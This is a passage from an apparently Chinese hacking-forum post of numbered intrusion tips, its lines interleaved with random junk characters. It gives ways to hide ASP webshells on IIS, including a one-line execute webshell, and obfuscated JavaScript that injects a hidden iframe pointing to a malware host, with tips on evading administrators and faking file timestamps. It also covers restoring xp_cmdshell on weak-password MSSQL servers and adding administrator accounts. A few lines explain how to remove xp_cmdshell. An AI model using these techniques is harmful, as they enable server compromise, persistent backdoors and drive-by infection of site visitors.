% Z9 J5 k% X4 G5 B7 L& `用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
) j" q A9 [0 X3 b
) {5 X8 S) B1 o2 y; n7 N53、隐藏ASP后门的两种方法7 |* o# w5 U9 c+ ~
1、建立非标准目录:mkdir images..\' c( N3 H5 j: \6 A3 c
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
6 I; z F7 ]7 x0 t通过web访问ASP木马:http://ip/images../news.asp?action=login
7 Z9 s' `# F( n$ H) d+ t/ M如何删除非标准目录:rmdir images..\ /s
2 l$ k3 C% z5 c* ~' o/ u) h& c. A$ ]; h2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:! m$ d% Q u Y$ k- ^2 N4 l
mkdir programme.asp2 s" X4 u6 Z! s" c4 B
新建1.txt文件内容:<!--#include file=”12.jpg”-->( W+ m% S( C9 B8 T# q+ \& t. P
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
3 N( c8 F% }$ e) mattrib +H +S programme.asp
- T" Q' P8 D5 h6 k; V& t6 B9 `通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
; F) M5 `6 M9 v( O3 Y2 A$ L$ ~6 ]: j$ ]* d4 N/ m
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
( {& | L( \; }. E2 l8 Q2 x/ B然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
4 E& Q+ k7 ]% n$ e; ]3 ^# Z" U) x$ Z- P5 P( [1 W+ U; L
55、JS隐蔽挂马 p8 G7 P5 J) b+ l1 s
1.
3 g5 ^. j! U4 d" e) |var tr4c3="<iframe src=ht";
8 F/ _9 Q" I4 Y( d4 a. ^! ytr4c3 = tr4c3+"tp:/";4 v }1 i' i1 M7 y& M9 M2 h8 B. {
tr4c3 = tr4c3+"/ww";/ X. v) s9 l" a) x; g( Q
tr4c3 = tr4c3+"w.tr4";
3 j- x. H6 z* _# z' m5 ?+ [1 @tr4c3 = tr4c3+"c3.com/inc/m";
4 O7 y: o5 l: C! o% Ctr4c3 = tr4c3+"m.htm style="display:none"></i";
& y" t1 J2 k# e atr4c3 =tr4c3+"frame>'";! f# g4 E* l# D/ M. v% ?# J% J
document.write(tr4c3);
% A7 J- @. O/ n3 K! B) h: T! Q避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
4 ?* {/ {/ q9 k; N+ |
4 x$ s; K! z- l" O7 _, i2.
6 p$ d a* W! F6 O& I5 Z3 k( \$ ]转换进制,然后用EVAL执行。如
2 P0 L8 _8 a! F3 M" keval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
* e* ^* |8 j" r, a. O/ T* j不过这个有点显眼。
" {% B- R+ F# G9 A- r7 z! I( e3.
- m0 ^" P7 D9 K. k! ^# h1 }document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');+ }* G: B. p5 l- n! b- Y4 R. k
最后一点,别忘了把文件的时间也修改下。5 s. _7 B- S( t6 X% V
6 Q: u: `0 r; S2 V! Q
56.3389终端入侵常用DOS命令
- t7 P! j: h" `taskkill taskkill /PID 1248 /t
/ ?; N- D9 L/ B% K$ e$ U. U! p- T$ @* Z7 g
tasklist 查进程/ j; c. u# }! m* U! J) `, N2 L
! O0 ^& v) G$ Q+ D# K
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
- d7 O3 y! ? g+ U( hiisreset /reboot( Q" z d5 G- T2 y" V. \
tsshutdn /reboot /delay:1 重起服务器- M' g2 F8 j6 s' q
6 \& p( E2 x5 L* N
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,. j5 G# R" S, ]
2 H- o( e, |7 x! o; Y3 m3 y
query user 查看当前终端用户在线情况4 q ?# P# O9 z
# x: c- L% M" z3 @* `. S+ q4 ]* T要显示有关所有会话使用的进程的信息,请键入:query process *
+ v, Q8 P& @; C, [9 m( Y0 T6 P/ e/ z! j/ i2 J! }3 g
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
0 s8 U" X, @1 v$ a" `* d6 G5 n7 P
/ S- B% K: p! F! E4 _. m" N0 B要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
# A( {* k: z9 [2 c+ K% `
( Z4 D- m; G' U9 A! ^要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM027 m/ u, k: ?! K7 e" J9 U
; h! L; a9 U( f( L+ ?8 V
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
4 D/ h; P8 V5 G
9 N5 [( u4 g8 y' U9 a命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统$ b6 i$ F1 A' H: v* y! b) S" Y0 N
/ G: l, v! {1 x& O; j命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
4 \: Q$ o4 f' v0 @* J+ Z7 { e5 q- {! S4 Q% T1 D, ?
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机+ x9 a2 H5 Q1 ^3 y6 z
2 V5 P# N6 b( D56、在地址栏或按Ctrl+O,输入:
( \7 ?1 N7 u( p* S* {0 ?4 Q: _& Ojavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;3 s5 O Q" }; [ w4 C' H9 s& h9 f2 P2 A
1 \8 w( n3 g K# R源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
" I4 O; {5 ]1 u" U9 z5 ^- k) P# h# t8 d( I: x
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
b/ U/ U g6 Z- S用net localgroup administrators是可以看到管理组下,加了$的用户的。( @1 {- o5 ?( g- x/ _* I
+ i+ j1 e$ } M6 H! N
58、 sa弱口令相关命令
3 o, @! g& {- W. d
! n& f6 M, J* w v3 D1 H# {% [) M一.更改sa口令方法: U% C+ H4 K2 c" N+ D. M
用sql综合利用工具连接后,执行命令:
5 C0 t+ G9 q. P4 ]- ?exec sp_password NULL,'20001001','sa'4 C6 I& k) c, E" Y+ X
(提示:慎用!)* G* M4 h1 T% p3 Y- p8 p# S
& Q d6 g0 h+ u2 {
二.简单修补sa弱口令.! X' L% F6 D8 s" M; z7 L" r+ Z
3 v4 r/ O# O* g方法1:查询分离器连接后执行:
8 S2 R) C1 Y: M# E& Dif exists (select * from
6 g9 c: y& D8 Qdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
7 D1 L0 f7 ^0 _& f7 r; W; @1 `6 Q- \OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
) d* m2 S9 w; P/ R; p9 l* r c% T" y. a3 h7 e* u) \' V% f
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
- N9 C C! [0 t: K& k' n- l- E# Z
6 R1 D2 \7 Q+ J, lGO
" ~3 C0 V. u% C( |7 M2 \$ ~$ {1 K" {/ Z) u& P$ S
然后按F5键命令执行完毕5 A* u, D% R8 g9 N, L
5 @* e7 ~" ~7 d O
方法2:查询分离器连接后
7 P2 g6 s8 T: B4 u第一步执行:use master
) E# j$ t( [8 x# U% H# A' L* M; W第二步执行:sp_dropextendedproc 'xp_cmdshell'4 ~: ]/ @5 D* y' Q
然后按F5键命令执行完毕# c+ o+ X! o" g4 `4 y- y! o3 @
) R; f2 B0 N* p; j: _9 B {7 A p* J# ]: {- q; ~4 x
三.常见情况恢复执行xp_cmdshell.# D5 f- V- w1 U+ |- X
2 q* O+ `1 V( ^( c
' q6 E Q( _* u! @1 X1 未能找到存储过程'master..xpcmdshell'.* T8 {' e( c1 d; [3 k# D
恢复方法:查询分离器连接后,
3 \3 M) ]. a3 N& j: ] u! `+ P第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
( z* N) j8 o& X+ X6 F第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
6 T! N0 Y4 z, u5 _然后按F5键命令执行完毕
! @$ ~5 g* l' H9 `" ]* E$ r% M$ U4 Q% E9 o. {% o [ L
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)% C( K* @' [# Z( x) J' X- J7 J" p \- r1 b
恢复方法:查询分离器连接后,+ b6 K! k' ?# G6 V
第一步执行:sp_dropextendedproc "xp_cmdshell"
7 W1 T( t7 j4 l2 P& m: G' [第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'2 A6 D7 p# e' I" A' C
然后按F5键命令执行完毕
- k; Q1 k4 w$ w& [* _6 V3 r
) h% \8 p/ N o% M8 p3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)8 b0 a/ L' @6 e/ r3 N
恢复方法:查询分离器连接后,$ b% S3 B- W. a* p
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
2 s. N( D' g* y) l$ D7 i+ l1 I# A第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 0 B/ S5 R$ k) U) R* Y, e+ O4 D
然后按F5键命令执行完毕+ o1 j& M* T8 A. ]0 G
' d4 Y0 B$ h$ ]/ r* {, H. b
四.终极方法.
7 G4 g, n) F' _2 Y6 |如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
4 i4 w$ V' K3 e! K8 c9 V1 A查询分离器连接后,
( _% k, A8 I0 M0 b2000servser系统:0 E: D/ A& y/ S; Q8 {5 ~
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
+ A1 U) O5 z& S+ {- E% R% `5 i" D9 i1 U: b) A( o- Q: Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
2 r* O) _1 p/ S7 d- G
4 Q7 y0 j! i j4 F! Lxp或2003server系统:5 \ B7 P/ [% A% b3 i% Y
9 Z0 d; y/ f/ e: }) l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
* p, I4 n, q6 S6 v
1 o% v z: {( xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'7 u7 R: I2 Y0 y+ T
|
发表于 2012-9-15 14:51:03
收藏
支持
反对